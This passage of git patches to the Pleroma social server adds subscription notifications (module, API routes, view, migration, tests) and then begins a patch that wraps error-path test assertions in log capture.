+ end
+ end
+
+ def create_notifications(%Activity{data: %{"to" => _, "type" => "Create"}} = activity) do
+ object = Object.normalize(activity)
+
+ unless object && object.data["type"] == "Answer" do
+ users = get_notified_from_activity(activity)
+ notifications = Enum.map(users, fn user -> create_notification(activity, user) end)
+ {:ok, notifications}
+ else
+ {:ok, []}
+ end
+ end
+
+ def create_notifications(%Activity{data: %{"to" => _, "type" => type}} = activity)
+ when type in ["Like", "Announce", "Follow"] do
+ users = get_notified_from_activity(activity)
+ notifications = Enum.map(users, fn user -> create_notification(activity, user) end)
+ {:ok, notifications}
+ end
+
+ def create_notifications(_), do: {:ok, []}
+
+ # TODO move to sql, too.
+ def create_notification(%Activity{} = activity, %User{} = user) do
+ unless skip?(activity, user) do
+ notification = %SubscriptionNotification{user_id: user.id, activity: activity}
+ {:ok, notification} = Repo.insert(notification)
+ Streamer.stream("user", notification)
+ Streamer.stream("user:subscription_notification", notification)
+ Push.send(notification)
+ notification
+ end
+ end
+
+ def get_notified_from_activity(activity, local_only \\ true)
+
+ def get_notified_from_activity(
+ %Activity{data: %{"to" => _, "type" => type} = _data} = activity,
+ local_only
+ )
+ when type in ["Create", "Like", "Announce", "Follow"] do
+ recipients =
+ []
+ |> Utils.maybe_notify_subscribers(activity)
+ |> Enum.uniq()
+
+ User.get_users_from_set(recipients, local_only)
+ end
+
+ def get_notified_from_activity(_, _local_only), do: []
+
+ @spec skip?(Activity.t(), User.t()) :: boolean()
+ def skip?(activity, user) do
+ [
+ :self,
+ :followers,
+ :follows,
+ :non_followers,
+ :non_follows,
+ :recently_followed
+ ]
+ |> Enum.any?(&skip?(&1, activity, user))
+ end
+
+ @spec skip?(atom(), Activity.t(), User.t()) :: boolean()
+ def skip?(:self, activity, user) do
+ activity.data["actor"] == user.ap_id
+ end
+
+ def skip?(
+ :followers,
+ activity,
+ %{info: %{notification_settings: %{"followers" => false}}} = user
+ ) do
+ actor = activity.data["actor"]
+ follower = User.get_cached_by_ap_id(actor)
+ User.following?(follower, user)
+ end
+
+ def skip?(
+ :non_followers,
+ activity,
+ %{info: %{notification_settings: %{"non_followers" => false}}} = user
+ ) do
+ actor = activity.data["actor"]
+ follower = User.get_cached_by_ap_id(actor)
+ !User.following?(follower, user)
+ end
+
+ def skip?(:follows, activity, %{info: %{notification_settings: %{"follows" => false}}} = user) do
+ actor = activity.data["actor"]
+ followed = User.get_cached_by_ap_id(actor)
+ User.following?(user, followed)
+ end
+
+ def skip?(
+ :non_follows,
+ activity,
+ %{info: %{notification_settings: %{"non_follows" => false}}} = user
+ ) do
+ actor = activity.data["actor"]
+ followed = User.get_cached_by_ap_id(actor)
+ !User.following?(user, followed)
+ end
+
+ def skip?(:recently_followed, %{data: %{"type" => "Follow"}} = activity, user) do
+ actor = activity.data["actor"]
+
+ SubscriptionNotification.for_user(user)
+ |> Enum.any?(fn
+ %{activity: %{data: %{"type" => "Follow", "actor" => ^actor}}} -> true
+ _ -> false
+ end)
+ end
+
+ def skip?(_, _, _), do: false
+end
diff --git a/lib/pleroma/web/activity_pub/activity_pub.ex b/lib/pleroma/web/activity_pub/activity_pub.ex
index d23ec66ac..bc9a7a2d6 100644
--- a/lib/pleroma/web/activity_pub/activity_pub.ex
+++ b/lib/pleroma/web/activity_pub/activity_pub.ex
@@ -12,6 +12,7 @@ defmodule Pleroma.Web.ActivityPub.ActivityPub do
alias Pleroma.Object.Fetcher
alias Pleroma.Pagination
alias Pleroma.Repo
+ alias Pleroma.SubscriptionNotification
alias Pleroma.Upload
alias Pleroma.User
alias Pleroma.Web.ActivityPub.MRF
@@ -148,6 +149,7 @@ def insert(map, local \\ true, fake \\ false, bypass_actor_check \\ false) when
PleromaJobQueue.enqueue(:background, Pleroma.Web.RichMedia.Helpers, [:fetch, activity])
Notification.create_notifications(activity)
+ SubscriptionNotification.create_notifications(activity)
participations =
activity
diff --git a/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex b/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
index c54462bb3..3730c962c 100644
--- a/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
+++ b/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
@@ -23,6 +23,7 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIController do
alias Pleroma.Repo
alias Pleroma.ScheduledActivity
alias Pleroma.Stats
+ alias Pleroma.SubscriptionNotification
alias Pleroma.User
alias Pleroma.Web
alias Pleroma.Web.ActivityPub.ActivityPub
@@ -39,6 +40,7 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIController do
alias Pleroma.Web.MastodonAPI.ReportView
alias Pleroma.Web.MastodonAPI.ScheduledActivityView
alias Pleroma.Web.MastodonAPI.StatusView
+ alias Pleroma.Web.MastodonAPI.SubscriptionNotificationView
alias Pleroma.Web.MediaProxy
alias Pleroma.Web.OAuth.App
alias Pleroma.Web.OAuth.Authorization
@@ -725,6 +727,28 @@ def notifications(%{assigns: %{user: user}} = conn, params) do
|> render("index.json", %{notifications: notifications, for: user})
end
+ def subscription_notifications(%{assigns: %{user: user}} = conn, params) do
+ notifications = MastodonAPI.get_subscription_notifications(user, params)
+
+ conn
+ |> add_link_headers(:subscription_notifications, notifications)
+ |> put_view(SubscriptionNotificationView)
+ |> render("index.json", %{notifications: notifications, for: user})
+ end
+
+ def get_subscription_notification(%{assigns: %{user: user}} = conn, %{"id" => id} = _params) do
+ with {:ok, notification} <- SubscriptionNotification.get(user, id) do
+ conn
+ |> put_view(SubscriptionNotificationView)
+ |> render("show.json", %{subscription_notification: notification, for: user})
+ else
+ {:error, reason} ->
+ conn
+ |> put_status(:forbidden)
+ |> json(%{"error" => reason})
+ end
+ end
+
def get_notification(%{assigns: %{user: user}} = conn, %{"id" => id} = _params) do
with {:ok, notification} <- Notification.get(user, id) do
conn
@@ -743,6 +767,11 @@ def clear_notifications(%{assigns: %{user: user}} = conn, _params) do
json(conn, %{})
end
+ def clear_subscription_notifications(%{assigns: %{user: user}} = conn, _params) do
+ SubscriptionNotification.clear(user)
+ json(conn, %{})
+ end
+
def dismiss_notification(%{assigns: %{user: user}} = conn, %{"id" => id} = _params) do
with {:ok, _notif} <- Notification.dismiss(user, id) do
json(conn, %{})
@@ -754,11 +783,30 @@ def dismiss_notification(%{assigns: %{user: user}} = conn, %{"id" => id} = _para
end
end
+ def dismiss_subscription_notification(%{assigns: %{user: user}} = conn, %{"id" => id} = _params) do
+ with {:ok, _notif} <- SubscriptionNotification.dismiss(user, id) do
+ json(conn, %{})
+ else
+ {:error, reason} ->
+ conn
+ |> put_status(:forbidden)
+ |> json(%{"error" => reason})
+ end
+ end
+
def destroy_multiple(%{assigns: %{user: user}} = conn, %{"ids" => ids} = _params) do
Notification.destroy_multiple(user, ids)
json(conn, %{})
end
+ def destroy_multiple_subscription_notifications(
+ %{assigns: %{user: user}} = conn,
+ %{"ids" => ids} = _params
+ ) do
+ SubscriptionNotification.destroy_multiple(user, ids)
+ json(conn, %{})
+ end
+
def relationships(%{assigns: %{user: user}} = conn, %{"id" => id}) do
id = List.wrap(id)
q = from(u in User, where: u.id in ^id)
diff --git a/lib/pleroma/web/mastodon_api/mastodon_api.ex b/lib/pleroma/web/mastodon_api/mastodon_api.ex
index ac01d1ff3..6751e24d8 100644
--- a/lib/pleroma/web/mastodon_api/mastodon_api.ex
+++ b/lib/pleroma/web/mastodon_api/mastodon_api.ex
@@ -10,6 +10,7 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPI do
alias Pleroma.Notification
alias Pleroma.Pagination
alias Pleroma.ScheduledActivity
+ alias Pleroma.SubscriptionNotification
alias Pleroma.User
alias Pleroma.Web.CommonAPI
@@ -62,6 +63,15 @@ def get_notifications(user, params \\ %{}) do
|> Pagination.fetch_paginated(params)
end
+ def get_subscription_notifications(user, params \\ %{}) do
+ options = cast_params(params)
+
+ user
+ |> SubscriptionNotification.for_user_query(options)
+ |> restrict(:exclude_types, options)
+ |> Pagination.fetch_paginated(params)
+ end
+
def get_scheduled_activities(user, params \\ %{}) do
user
|> ScheduledActivity.for_user_query()
diff --git a/lib/pleroma/web/mastodon_api/views/subscription_notification_view.ex b/lib/pleroma/web/mastodon_api/views/subscription_notification_view.ex
new file mode 100644
index 000000000..c6f0b5064
--- /dev/null
+++ b/lib/pleroma/web/mastodon_api/views/subscription_notification_view.ex
@@ -0,0 +1,61 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Web.MastodonAPI.SubscriptionNotificationView do
+ use Pleroma.Web, :view
+
+ alias Pleroma.Activity
+ # alias Pleroma.SubscriptionNotification
+ alias Pleroma.User
+ alias Pleroma.Web.CommonAPI
+ alias Pleroma.Web.MastodonAPI.AccountView
+ alias Pleroma.Web.MastodonAPI.SubscriptionNotificationView
+ alias Pleroma.Web.MastodonAPI.StatusView
+
+ def render("index.json", %{notifications: notifications, for: user}) do
+ safe_render_many(notifications, SubscriptionNotificationView, "show.json", %{for: user})
+ end
+
+ def render("show.json", %{
+ subscription_notification: %{activity: activity} = notification,
+ for: user
+ }) do
+ actor = User.get_cached_by_ap_id(activity.data["actor"])
+ parent_activity = Activity.get_create_by_object_ap_id(activity.data["object"])
+ mastodon_type = Activity.mastodon_notification_type(activity)
+
+ response = %{
+ id: to_string(notification.id),
+ type: mastodon_type,
+ created_at: CommonAPI.Utils.to_masto_date(notification.inserted_at),
+ account: AccountView.render("account.json", %{user: actor, for: user})
+ }
+
+ case mastodon_type do
+ "mention" ->
+ response
+ |> Map.merge(%{
+ status: StatusView.render("status.json", %{activity: activity, for: user})
+ })
+
+ "favourite" ->
+ response
+ |> Map.merge(%{
+ status: StatusView.render("status.json", %{activity: parent_activity, for: user})
+ })
+
+ "reblog" ->
+ response
+ |> Map.merge(%{
+ status: StatusView.render("status.json", %{activity: parent_activity, for: user})
+ })
+
+ "follow" ->
+ response
+
+ _ ->
+ nil
+ end
+ end
+end
diff --git a/lib/pleroma/web/pleroma_api/pleroma_api_controller.ex b/lib/pleroma/web/pleroma_api/pleroma_api_controller.ex
index f4df3b024..71792d913 100644
--- a/lib/pleroma/web/pleroma_api/pleroma_api_controller.ex
+++ b/lib/pleroma/web/pleroma_api/pleroma_api_controller.ex
@@ -9,6 +9,7 @@ defmodule Pleroma.Web.PleromaAPI.PleromaAPIController do
alias Pleroma.Conversation.Participation
alias Pleroma.Notification
+ alias Pleroma.SubscriptionNotification
alias Pleroma.Web.ActivityPub.ActivityPub
alias Pleroma.Web.MastodonAPI.ConversationView
alias Pleroma.Web.MastodonAPI.NotificationView
@@ -95,4 +96,29 @@ def read_notification(%{assigns: %{user: user}} = conn, %{"max_id" => max_id}) d
|> render("index.json", %{notifications: notifications, for: user})
end
end
+
+ def delete_subscription_notification(%{assigns: %{user: user}} = conn, %{
+ "id" => notification_id
+ }) do
+ with {:ok, notification} <- SubscriptionNotification.dismiss(user, notification_id) do
+ conn
+ |> put_view(NotificationView)
+ |> render("show.json", %{notification: notification, for: user})
+ else
+ {:error, message} ->
+ conn
+ |> put_status(:bad_request)
+ |> json(%{"error" => message})
+ end
+ end
+
+ def read_subscription_notification(%{assigns: %{user: user}} = conn, %{"max_id" => max_id}) do
+ with notifications <- SubscriptionNotification.clear_up_to(user, max_id) do
+ notifications = Enum.take(notifications, 80)
+
+ conn
+ |> put_view(NotificationView)
+ |> render("index.json", %{notifications: notifications, for: user})
+ end
+ end
end
diff --git a/lib/pleroma/web/push/impl.ex b/lib/pleroma/web/push/impl.ex
index 35d3ff07c..7ea5607fa 100644
--- a/lib/pleroma/web/push/impl.ex
+++ b/lib/pleroma/web/push/impl.ex
@@ -9,6 +9,7 @@ defmodule Pleroma.Web.Push.Impl do
alias Pleroma.Notification
alias Pleroma.Object
alias Pleroma.Repo
+ alias Pleroma.SubscriptionNotification
alias Pleroma.User
alias Pleroma.Web.Metadata.Utils
alias Pleroma.Web.Push.Subscription
@@ -19,7 +20,7 @@ defmodule Pleroma.Web.Push.Impl do
@types ["Create", "Follow", "Announce", "Like"]
@doc "Performs sending notifications for user subscriptions"
- @spec perform(Notification.t()) :: list(any) | :error
+ @spec perform(Notification.t() | SubscriptionNotification.t()) :: list(any) | :error
def perform(
%{
activity: %{data: %{"type" => activity_type}, id: activity_id} = activity,
diff --git a/lib/pleroma/web/router.ex b/lib/pleroma/web/router.ex
index b0464037e..dbd0deecd 100644
--- a/lib/pleroma/web/router.ex
+++ b/lib/pleroma/web/router.ex
@@ -300,11 +300,39 @@ defmodule Pleroma.Web.Router do
get("/bookmarks", MastodonAPIController, :bookmarks)
post("/notifications/clear", MastodonAPIController, :clear_notifications)
+
+ post(
+ "/notifications/subscription/clear",
+ MastodonAPIController,
+ :clear_subscription_notifications
+ )
+
post("/notifications/dismiss", MastodonAPIController, :dismiss_notification)
+
+ post(
+ "/notifications/subscription/dismiss",
+ MastodonAPIController,
+ :dismiss_subscription_notification
+ )
+
get("/notifications", MastodonAPIController, :notifications)
+ get("/notifications/subscription", MastodonAPIController, :subscription_notifications)
get("/notifications/:id", MastodonAPIController, :get_notification)
+
+ get(
+ "/notifications/subscription/:id",
+ MastodonAPIController,
+ :get_subscription_notification
+ )
+
delete("/notifications/destroy_multiple", MastodonAPIController, :destroy_multiple)
+ delete(
+ "/notifications/subscription/destroy_multiple",
+ MastodonAPIController,
+ :destroy_multiple_subscription_notifications
+ )
+
get("/scheduled_statuses", MastodonAPIController, :scheduled_statuses)
get("/scheduled_statuses/:id", MastodonAPIController, :show_scheduled_status)
diff --git a/lib/pleroma/web/streamer.ex b/lib/pleroma/web/streamer.ex
index 587c43f40..42d95e33a 100644
--- a/lib/pleroma/web/streamer.ex
+++ b/lib/pleroma/web/streamer.ex
@@ -10,6 +10,7 @@ defmodule Pleroma.Web.Streamer do
alias Pleroma.Conversation.Participation
alias Pleroma.Notification
alias Pleroma.Object
+ alias Pleroma.SubscriptionNotification
alias Pleroma.User
alias Pleroma.Web.ActivityPub.ActivityPub
alias Pleroma.Web.ActivityPub.Visibility
@@ -208,10 +209,17 @@ def represent_conversation(%Participation{} = participation) do
|> Jason.encode!()
end
- @spec represent_notification(User.t(), Notification.t()) :: binary()
- defp represent_notification(%User{} = user, %Notification{} = notify) do
+ @spec represent_notification(User.t(), Notification.t() | %SubscriptionNotification{}) ::
+ binary()
+ defp represent_notification(%User{} = user, notify) do
+ event =
+ case notify do
+ %Notification{} -> "notification"
+ %SubscriptionNotification{} -> "subscription_norification"
+ end
+
%{
- event: "notification",
+ event: event,
payload:
NotificationView.render(
"show.json",
diff --git a/priv/repo/migrations/20190824195028_create_subscription_notifications.exs b/priv/repo/migrations/20190824195028_create_subscription_notifications.exs
new file mode 100644
index 000000000..fcceb4386
--- /dev/null
+++ b/priv/repo/migrations/20190824195028_create_subscription_notifications.exs
@@ -0,0 +1,15 @@
+defmodule Pleroma.Repo.Migrations.CreateSubscriptionNotifications do
+ use Ecto.Migration
+
+ def change do
+ create_if_not_exists table(:subscription_notifications) do
+ add(:user_id, references(:users, type: :uuid, on_delete: :delete_all))
+ add(:activity_id, references(:activities, type: :uuid, on_delete: :delete_all))
+
+ timestamps()
+ end
+
+ create_if_not_exists(index(:subscription_notifications, [:user_id]))
+ create_if_not_exists(index(:subscription_notifications, ["id desc nulls last"]))
+ end
+end
diff --git a/test/notification_test.exs b/test/notification_test.exs
index 2a52dad8d..0e2635aad 100644
--- a/test/notification_test.exs
+++ b/test/notification_test.exs
@@ -32,16 +32,16 @@ test "notifies someone when they are directly addressed" do
assert other_notification.activity_id == activity.id
end
- test "it creates a notification for subscribed users" do
+ test "it does not create a notification for subscribed users" do
user = insert(:user)
subscriber = insert(:user)
User.subscribe(subscriber, user)
{:ok, status} = CommonAPI.post(user, %{"status" => "Akariiiin"})
- {:ok, [notification]} = Notification.create_notifications(status)
+ {:ok, notifications} = Notification.create_notifications(status)
- assert notification.user_id == subscriber.id
+ assert notifications == []
end
test "does not create a notification for subscribed users if status is a reply" do
@@ -190,14 +190,16 @@ test "it doesn't create a notification for follow-unfollow-follow chains" do
refute Notification.create_notification(activity_dupe, followed_user)
end
- test "it doesn't create duplicate notifications for follow+subscribed users" do
+ test "it doesn't create notifications for follow+subscribed users" do
user = insert(:user)
subscriber = insert(:user)
{:ok, _, _, _} = CommonAPI.follow(subscriber, user)
User.subscribe(subscriber, user)
{:ok, status} = CommonAPI.post(user, %{"status" => "Akariiiin"})
- {:ok, [_notif]} = Notification.create_notifications(status)
+ {:ok, notifications} = Notification.create_notifications(status)
+
+ assert notifications == []
end
test "it doesn't create subscription notifications if the recipient cannot see the status" do
diff --git a/test/web/mastodon_api/mastodon_api_controller_test.exs b/test/web/mastodon_api/mastodon_api_controller_test.exs
index f4902d043..95fcecc52 100644
--- a/test/web/mastodon_api/mastodon_api_controller_test.exs
+++ b/test/web/mastodon_api/mastodon_api_controller_test.exs
@@ -13,6 +13,7 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIControllerTest do
alias Pleroma.Object
alias Pleroma.Repo
alias Pleroma.ScheduledActivity
+ alias Pleroma.SubscriptionNotification
alias Pleroma.User
alias Pleroma.Web.ActivityPub.ActivityPub
alias Pleroma.Web.CommonAPI
@@ -1273,6 +1274,197 @@ test "see notifications after muting user with notifications and with_muted para
end
end
+ describe "subscription_notifications" do
+ setup do
+ user = insert(:user)
+ subscriber = insert(:user)
+
+ User.subscribe(subscriber, user)
+
+ {:ok, %{user: user, subscriber: subscriber}}
+ end
+
+ test "list of notifications", %{conn: conn, user: user, subscriber: subscriber} do
+ status_text = "Hello"
+ {:ok, _activity} = CommonAPI.post(user, %{"status" => status_text})
+
+ conn =
+ conn
+ |> assign(:user, subscriber)
+ |> get("/api/v1/notifications/subscription")
+
+ assert [%{"status" => %{"content" => response}} | _rest] = json_response(conn, 200)
+ assert response == status_text
+ end
+
+ test "getting a single notification", %{conn: conn, user: user, subscriber: subscriber} do
+ status_text = "Hello"
+
+ {:ok, _activity} = CommonAPI.post(user, %{"status" => status_text})
+ [notification] = Repo.all(SubscriptionNotification)
+
+ conn =
+ conn
+ |> assign(:user, subscriber)
+ |> get("/api/v1/notifications/subscription/#{notification.id}")
+
+ assert %{"status" => %{"content" => response}} = json_response(conn, 200)
+ assert response == status_text
+ end
+
+ test "dismissing a single notification also deletes it", %{
+ conn: conn,
+ user: user,
+ subscriber: subscriber
+ } do
+ status_text = "Hello"
+ {:ok, _activity} = CommonAPI.post(user, %{"status" => status_text})
+
+ [notification] = Repo.all(SubscriptionNotification)
+
+ conn =
+ conn
+ |> assign(:user, subscriber)
+ |> post("/api/v1/notifications/subscription/dismiss", %{"id" => notification.id})
+
+ assert %{} = json_response(conn, 200)
+
+ assert Repo.all(SubscriptionNotification) == []
+ end
+
+ test "clearing all notifications also deletes them", %{
+ conn: conn,
+ user: user,
+ subscriber: subscriber
+ } do
+ status_text1 = "Hello"
+ status_text2 = "Hello again"
+ {:ok, _activity1} = CommonAPI.post(user, %{"status" => status_text1})
+ {:ok, _activity2} = CommonAPI.post(user, %{"status" => status_text2})
+
+ conn =
+ conn
+ |> assign(:user, subscriber)
+ |> post("/api/v1/notifications/subscription/clear")
+
+ assert %{} = json_response(conn, 200)
+
+ conn =
+ build_conn()
+ |> assign(:user, subscriber)
+ |> get("/api/v1/notifications/subscription")
+
+ assert json_response(conn, 200) == []
+
+ assert Repo.all(SubscriptionNotification) == []
+ end
+
+ test "paginates notifications using min_id, since_id, max_id, and limit", %{
+ conn: conn,
+ user: user,
+ subscriber: subscriber
+ } do
+ {:ok, activity1} = CommonAPI.post(user, %{"status" => "Hello 1"})
+ {:ok, activity2} = CommonAPI.post(user, %{"status" => "Hello 2"})
+ {:ok, activity3} = CommonAPI.post(user, %{"status" => "Hello 3"})
+ {:ok, activity4} = CommonAPI.post(user, %{"status" => "Hello 4"})
+
+ notification1_id =
+ Repo.get_by(SubscriptionNotification, activity_id: activity1.id).id |> to_string()
+
+ notification2_id =
+ Repo.get_by(SubscriptionNotification, activity_id: activity2.id).id |> to_string()
+
+ notification3_id =
+ Repo.get_by(SubscriptionNotification, activity_id: activity3.id).id |> to_string()
+
+ notification4_id =
+ Repo.get_by(SubscriptionNotification, activity_id: activity4.id).id |> to_string()
+
+ conn = assign(conn, :user, subscriber)
+
+ # min_id
+ conn_res =
+ get(conn, "/api/v1/notifications/subscription?limit=2&min_id=#{notification1_id}")
+
+ result = json_response(conn_res, 200)
+ assert [%{"id" => ^notification3_id}, %{"id" => ^notification2_id}] = result
+
+ # since_id
+ conn_res =
+ get(conn, "/api/v1/notifications/subscription?limit=2&since_id=#{notification1_id}")
+
+ result = json_response(conn_res, 200)
+ assert [%{"id" => ^notification4_id}, %{"id" => ^notification3_id}] = result
+
+ # max_id
+ conn_res =
+ get(conn, "/api/v1/notifications/subscription?limit=2&max_id=#{notification4_id}")
+
+ result = json_response(conn_res, 200)
+ assert [%{"id" => ^notification3_id}, %{"id" => ^notification2_id}] = result
+ end
+
+ test "destroy multiple", %{conn: conn, user: user1, subscriber: user2} do
+ # mutual subscription
+ User.subscribe(user1, user2)
+
+ {:ok, activity1} = CommonAPI.post(user1, %{"status" => "Hello 1"})
+ {:ok, activity2} = CommonAPI.post(user1, %{"status" => "World 1"})
+ {:ok, activity3} = CommonAPI.post(user2, %{"status" => "Hello 2"})
+ {:ok, activity4} = CommonAPI.post(user2, %{"status" => "World 2"})
+
+ notification1_id =
+ Repo.get_by(SubscriptionNotification, activity_id: activity1.id).id |> to_string()
+
+ notification2_id =
+ Repo.get_by(SubscriptionNotification, activity_id: activity2.id).id |> to_string()
+
+ notification3_id =
+ Repo.get_by(SubscriptionNotification, activity_id: activity3.id).id |> to_string()
+
+ notification4_id =
+ Repo.get_by(SubscriptionNotification, activity_id: activity4.id).id |> to_string()
+
+ conn = assign(conn, :user, user1)
+
+ conn_res = get(conn, "/api/v1/notifications/subscription")
+
+ result = json_response(conn_res, 200)
+
+ Enum.each(result, fn %{"id" => id} ->
+ assert id in [notification3_id, notification4_id]
+ end)
+
+ conn2 = assign(conn, :user, user2)
+
+ conn_res = get(conn2, "/api/v1/notifications/subscription")
+
+ result = json_response(conn_res, 200)
+
+ Enum.each(result, fn %{"id" => id} ->
+ assert id in [notification1_id, notification2_id]
+ end)
+
+ conn_destroy =
+ delete(conn, "/api/v1/notifications/subscription/destroy_multiple", %{
+ "ids" => [notification3_id, notification4_id]
+ })
+
+ assert json_response(conn_destroy, 200) == %{}
+
+ conn_res = get(conn2, "/api/v1/notifications/subscription")
+
+ result = json_response(conn_res, 200)
+
+ Enum.each(result, fn %{"id" => id} ->
+ assert id in [notification1_id, notification2_id]
+ end)
+
+ assert length(Repo.all(SubscriptionNotification)) == 2
+ end
+ end
+
describe "reblogging" do
test "reblogs and returns the reblogged status", %{conn: conn} do
activity = insert(:note_activity)
diff --git a/test/web/mastodon_api/mastodon_api_test.exs b/test/web/mastodon_api/mastodon_api_test.exs
index 7fcb2bd55..848fce7ad 100644
--- a/test/web/mastodon_api/mastodon_api_test.exs
+++ b/test/web/mastodon_api/mastodon_api_test.exs
@@ -75,9 +75,9 @@ test "returns notifications for user" do
User.subscribe(subscriber, user)
- {:ok, status} = CommonAPI.post(user, %{"status" => "Akariiiin"})
+ {:ok, status} = CommonAPI.post(user, %{"status" => "Akariiiin @#{subscriber.nickname}"})
- {:ok, status1} = CommonAPI.post(user, %{"status" => "Magi"})
+ {:ok, status1} = CommonAPI.post(user, %{"status" => "Magi @#{subscriber.nickname}"})
{:ok, [notification]} = Notification.create_notifications(status)
{:ok, [notification1]} = Notification.create_notifications(status1)
res = MastodonAPI.get_notifications(subscriber)
From 25a64a4aa0a10bf06c2ccdf9a6c493f184170a89 Mon Sep 17 00:00:00 2001
From: stwf
Date: Fri, 13 Sep 2019 11:46:41 -0400
Subject: [PATCH 064/272] Capture test error messages where appropriate
---
test/integration/mastodon_websocket_test.exs | 29 ++++++++++++++-----
test/web/activity_pub/publisher_test.exs | 24 +++++++++------
test/web/activity_pub/relay_test.exs | 13 +++++++--
.../mastodon_api_controller_test.exs | 14 +++++----
test/web/twitter_api/util_controller_test.exs | 13 +++++----
.../web_finger/web_finger_controller_test.exs | 13 +++++----
6 files changed, 70 insertions(+), 36 deletions(-)
diff --git a/test/integration/mastodon_websocket_test.exs b/test/integration/mastodon_websocket_test.exs
index 3975cdcd6..63bf73412 100644
--- a/test/integration/mastodon_websocket_test.exs
+++ b/test/integration/mastodon_websocket_test.exs
@@ -5,6 +5,7 @@
defmodule Pleroma.Integration.MastodonWebsocketTest do
use Pleroma.DataCase
+ import ExUnit.CaptureLog
import Pleroma.Factory
alias Pleroma.Integration.WebsocketClient
@@ -39,13 +40,17 @@ def start_socket(qs \\ nil, headers \\ []) do
end
test "refuses invalid requests" do
- assert {:error, {400, _}} = start_socket()
- assert {:error, {404, _}} = start_socket("?stream=ncjdk")
+ capture_log(fn ->
+ assert {:error, {400, _}} = start_socket()
+ assert {:error, {404, _}} = start_socket("?stream=ncjdk")
+ end)
end
test "requires authentication and a valid token for protected streams" do
- assert {:error, {403, _}} = start_socket("?stream=user&access_token=aaaaaaaaaaaa")
- assert {:error, {403, _}} = start_socket("?stream=user")
+ capture_log(fn ->
+ assert {:error, {403, _}} = start_socket("?stream=user&access_token=aaaaaaaaaaaa")
+ assert {:error, {403, _}} = start_socket("?stream=user")
+ end)
end
test "allows public streams without authentication" do
@@ -100,19 +105,27 @@ test "accepts valid tokens", state do
test "accepts the 'user' stream", %{token: token} = _state do
assert {:ok, _} = start_socket("?stream=user&access_token=#{token.token}")
- assert {:error, {403, "Forbidden"}} = start_socket("?stream=user")
+
+ assert capture_log(fn ->
+ assert {:error, {403, "Forbidden"}} = start_socket("?stream=user")
+ end) =~ ":badarg"
end
test "accepts the 'user:notification' stream", %{token: token} = _state do
assert {:ok, _} = start_socket("?stream=user:notification&access_token=#{token.token}")
- assert {:error, {403, "Forbidden"}} = start_socket("?stream=user:notification")
+
+ assert capture_log(fn ->
+ assert {:error, {403, "Forbidden"}} = start_socket("?stream=user:notification")
+ end) =~ ":badarg"
end
test "accepts valid token on Sec-WebSocket-Protocol header", %{token: token} do
assert {:ok, _} = start_socket("?stream=user", [{"Sec-WebSocket-Protocol", token.token}])
- assert {:error, {403, "Forbidden"}} =
- start_socket("?stream=user", [{"Sec-WebSocket-Protocol", "I am a friend"}])
+ assert capture_log(fn ->
+ assert {:error, {403, "Forbidden"}} =
+ start_socket("?stream=user", [{"Sec-WebSocket-Protocol", "I am a friend"}])
+ end) =~ ":badarg"
end
end
end
diff --git a/test/web/activity_pub/publisher_test.exs b/test/web/activity_pub/publisher_test.exs
index 36a39c84c..381757e1b 100644
--- a/test/web/activity_pub/publisher_test.exs
+++ b/test/web/activity_pub/publisher_test.exs
@@ -5,6 +5,7 @@
defmodule Pleroma.Web.ActivityPub.PublisherTest do
use Pleroma.DataCase
+ import ExUnit.CaptureLog
import Pleroma.Factory
import Tesla.Mock
import Mock
@@ -188,7 +189,10 @@ test "it returns inbox for messages involving single recipients in total" do
actor = insert(:user)
inbox = "http://connrefused.site/users/nick1/inbox"
- assert {:error, _} = Publisher.publish_one(%{inbox: inbox, json: "{}", actor: actor, id: 1})
+ assert capture_log(fn ->
+ assert {:error, _} =
+ Publisher.publish_one(%{inbox: inbox, json: "{}", actor: actor, id: 1})
+ end) =~ "connrefused"
assert called(Instances.set_unreachable(inbox))
end
@@ -212,14 +216,16 @@ test "it returns inbox for messages involving single recipients in total" do
actor = insert(:user)
inbox = "http://connrefused.site/users/nick1/inbox"
- assert {:error, _} =
- Publisher.publish_one(%{
- inbox: inbox,
- json: "{}",
- actor: actor,
- id: 1,
- unreachable_since: NaiveDateTime.utc_now()
- })
+ assert capture_log(fn ->
+ assert {:error, _} =
+ Publisher.publish_one(%{
+ inbox: inbox,
+ json: "{}",
+ actor: actor,
+ id: 1,
+ unreachable_since: NaiveDateTime.utc_now()
+ })
+ end) =~ "connrefused"
refute called(Instances.set_unreachable(inbox))
end
diff --git a/test/web/activity_pub/relay_test.exs b/test/web/activity_pub/relay_test.exs
index 4f7d592a6..9db4255d8 100644
--- a/test/web/activity_pub/relay_test.exs
+++ b/test/web/activity_pub/relay_test.exs
@@ -10,6 +10,7 @@ defmodule Pleroma.Web.ActivityPub.RelayTest do
alias Pleroma.Web.ActivityPub.ActivityPub
alias Pleroma.Web.ActivityPub.Relay
+ import ExUnit.CaptureLog
import Pleroma.Factory
import Mock
@@ -20,7 +21,9 @@ test "gets an actor for the relay" do
describe "follow/1" do
test "returns errors when user not found" do
- assert Relay.follow("test-ap-id") == {:error, "Could not fetch by AP id"}
+ assert capture_log(fn ->
+ assert Relay.follow("test-ap-id") == {:error, "Could not fetch by AP id"}
+ end) =~ "Could not fetch by AP id"
end
test "returns activity" do
@@ -37,7 +40,9 @@ test "returns activity" do
describe "unfollow/1" do
test "returns errors when user not found" do
- assert Relay.unfollow("test-ap-id") == {:error, "Could not fetch by AP id"}
+ assert capture_log(fn ->
+ assert Relay.unfollow("test-ap-id") == {:error, "Could not fetch by AP id"}
+ end) =~ "Could not fetch by AP id"
end
test "returns activity" do
@@ -78,7 +83,9 @@ test "returns error when object is unknown" do
}
)
- assert Relay.publish(activity) == {:error, nil}
+ assert capture_log(fn ->
+ assert Relay.publish(activity) == {:error, nil}
+ end) =~ "[error] error: nil"
end
test_with_mock "returns announce activity and publish to federate",
diff --git a/test/web/mastodon_api/mastodon_api_controller_test.exs b/test/web/mastodon_api/mastodon_api_controller_test.exs
index f4902d043..806ae7e69 100644
--- a/test/web/mastodon_api/mastodon_api_controller_test.exs
